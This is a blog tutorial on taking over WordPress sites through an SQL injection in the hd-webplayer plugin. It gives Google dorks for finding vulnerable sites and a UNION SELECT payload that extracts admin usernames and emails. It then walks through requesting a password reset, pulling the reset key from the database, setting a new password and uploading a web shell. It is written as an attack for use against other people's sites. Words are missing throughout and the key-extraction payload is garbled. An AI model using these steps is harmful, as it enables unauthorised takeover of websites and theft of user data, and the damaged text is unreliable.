As requested by few of you i decided to make this small tutorial on how to a wordpress site that has an SQLi in plugin.
watch this tutorial for more help:
So lets begin.
I will use this 0dayby JoinSeventh.
First of all we need to find a vulnerable page.
We enter this in Google:
:# Dork 1 (config.p)
inurl:"/wp-content/plugins/hd-webplayer/config.p?id="
# Dork 2 (playlist.p)
inurl:"/wp-content/plugins/hd-webplayer/playlist.p?id="
# Dork 3 (eral):
inurl:"/wp-content/plugins/hd-webplayer/"
When you found your site you need to find admin email and username.
I will be using this site for example:
:http://www.website.com/wp-content/plugins/hd-webplayer/playlist.p?id=3
When i add ' text disapprs so it is vulnerable.
NOTE: I will not demonstrate how to SQL inject.
Now we need admin username and email.
We need to inject:
:http://www.website.com/wp-content/plugins/hd-webplayer/playlist.p?id=-3 UNION SELECT 1,2,3,group_con(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
Now we have 2 users.
We pick one and copy his email.
Go to the login page of the site.
It is usually here:
:http://www.site.com/wp-login.p
And press "Lost your ?"
Now you enter either username or email.
We can enter both so it doesnt matter.
I entered email.
Now when you got:
"Check your e-mail for the confirmation link."
It mns that reset is successfully sent.
Now we need to get the .
Go back to the syntax you used for extracting email and username and do this:
:http://www.website.com/wp-content/plugins/hd-webplayer/playlist.p?id=-3 UNION SELECT 1,2,3,group_con(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
:http://www.website.com/wp-content/plugins/hd-webplayer/playlist.p?id=-3 UNION SELECT 1,2,3,group_con(user_login,0x3a,user__,0x3b),5,6,7,8,9,10,11 FROM wp_users--
Voila!
Now we just need to reset it.
Go to:
:wp-login.p?action=rp&=reset&login=username
NOTE: Replace = & login=
So my link will be:
Enter new :
Login with new and shell it.
Download p shell
No comments:
Post a Comment